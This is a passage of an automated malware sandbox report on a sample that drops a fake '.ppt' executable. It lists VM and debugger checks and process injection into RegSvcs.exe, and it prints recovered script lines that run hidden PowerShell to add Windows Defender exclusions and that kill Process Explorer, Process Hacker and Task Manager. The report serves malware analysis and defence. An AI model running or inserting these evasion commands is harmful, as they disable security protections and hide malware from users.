          Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894903844.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898812044.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895062521.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898912127.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021331796.0000000001546000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then4q
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then15
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021764963.000000000159F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021436447.0000000001592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeAwf
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenF,
          Source: cipkucw.ppt.exe, 00000013.00000003.2241646838.00000000016B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
          Source: cipkucw.ppt, 00000006.00000003.1895445953.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166453677.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241821530.0000000001653000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169741176.0000000001654000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241782650.000000000164E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021436447.0000000001592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe{uL
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeAPI call chain: ExitProcess graph end nodegraph_0-29963
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 12_2_01B71CE8 CheckRemoteDebuggerPresent,12_2_01B71CE8
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0076F3FF BlockInput,6_2_0076F3FF
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00296878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00296878
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_006F5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_006F5D78
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_0029ECAA mov eax, dword ptr fs:[00000030h] 0_2_0029ECAA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00715078 mov eax, dword ptr fs:[00000030h] 6_2_00715078
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FE5078 mov eax, dword ptr fs:[00000030h] 15_2_00FE5078
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_002A2CE0 GetProcessHeap,0_2_002A2CE0
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00296A0B SetUnhandledExceptionFilter,0_2_00296A0B
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_0029AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0029AAC4
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00295BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00295BBF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_007229B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007229B2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00710BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00710BCF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00710D65 SetUnhandledExceptionFilter,6_2_00710D65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00710FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00710FB1
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FF29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00FF29B2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FE0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00FE0BCF
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FE0D65 SetUnhandledExceptionFilter,15_2_00FE0D65
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FE0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00FE0FB1
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: CD9000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 479000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: D76000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 993000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00751A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00751A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_006F3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_006F3312
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $objantivirusproduct in $colitems
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $usb = $objantivirusproduct.displayname
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: next
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: return $usb
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: endfunc ;==>antivirus
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: func disabler()
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;if antivirus() = "windows defender" then
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;#requireadmin
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;endif
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: endfunc ;==>disabler
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: func antianalysis()
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if winexists("process explorer") then
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winclose("process explorer")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processclose("procexp64.exe")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processclose("procexp.exe")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if winexists("process hacker") then
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winclose("process hacker")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processclose("processhacker.exe")
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if processexists("taskmgr.exe") then
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processclose("taskmgr.exe")
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: word.document.12@
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ((((( h
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: late=c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clate=c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e=c;lc_m
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ice\apphvsiphvs
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 37nzvekvmemstr_adae9dc4-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w85frn3amemstr_51828bb4-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 20oaztoomemstr_fea3599f-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !e1b6memstr_aac7b9c7-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wta46478memstr_3ce181b8-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )0s7tmemstr_ee10894a-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8thl65z8memstr_57dcb40d-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d6vuqnq7memstr_cf0b78cc-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y4i131b7memstr_5023b9c8-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 768uwwm1memstr_c665dd1b-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5z6cwiknmemstr_06649453-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *r9cpmemstr_b80424be-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 74hl5h5wmemstr_0f3b6a7f-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fviewmemstr_528eb090-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9og2a1k2memstr_f4e1d765-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3v3v1n50memstr_07b21c32-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4frcp18memstr_60f989e5-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2ckermemstr_1d4e58d3-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 01jmg1g0memstr_0c8d4191-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d16j3p39memstr_b363d9b0-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zl29u4w4memstr_bfd42957-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7y29memstr_83343658-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gxbsv89tmemstr_862142dc-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ir615g00memstr_40ad5741-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @78nwmemstr_849bc4b5-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: szod35m1memstr_302bf1e0-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n059 dqc9memstr_f93f9fea-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tip4p8m3memstr_3878c088-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pb035oc3memstr_4c6e03e3-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4yhgkp9qmemstr_a1dc8a07-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psexg6g6memstr_00b19b84-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m5t278imemstr_1de5a6cc-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x225wncwmemstr_589c6cc9-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n7fhwmemstr_fa041dec-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 40es87ecmemstr_7ed94690-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ra2cyv9ememstr_d3c239e9-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x9xora2cyv9ememstr_2ed52f19-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 884wvzqrmemstr_88ee9f4c-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j3ojvb43memstr_ec802b98-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e078ymemstr_ce23710f-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 67gux6,umemstr_992f85bc-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id3jomemstr_635c79a7-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: structurmemstr_83ec658d-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: structure0or6memstr_445af030-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nn10smemstr_d9661f67-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eviewig0memstr_2d1ee572-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o8xbbmemstr_e2e51522-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4uzd3b1memstr_7e591592-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2p4p9qt9memstr_b7435673-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 86obek15memstr_f18f755a-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7b8vz1imemstr_2c68dd8a-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xymr57jomemstr_9af12529-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0m0c7qjmemstr_3baa96a8-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uwort7q4memstr_d3499357-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 57g570krmemstr_dad008c6-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c7t2f65nmemstr_646bf7fc-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gv3qbbdlmemstr_2a0df4ce-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: olpl4sx8memstr_99af9b51-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntgw81okmemstr_74da24b1-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k75e33f23memstr_84b9ef60-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :r9t6memstr_274c60ea-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rt73cmemstr_44dbc515-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eonv9memstr_25800470-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: buttoncmemstr_898d933b-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u2f6cmemstr_98441955-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: umys02nwmemstr_827b7b4b-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /l59dmemstr_9994586a-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i89t9t5qmemstr_684b8532-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh01kmemstr_cb092af1-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: asq8zvshmemstr_4a3d0ce3-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esjzmmemstr_e4cd0729-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 473x6z3lmemstr_3a0f6877-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2j741mmemstr_33cbea80-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h5748memstr_3893a4a5-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e0o848b5memstr_0059bba2-5
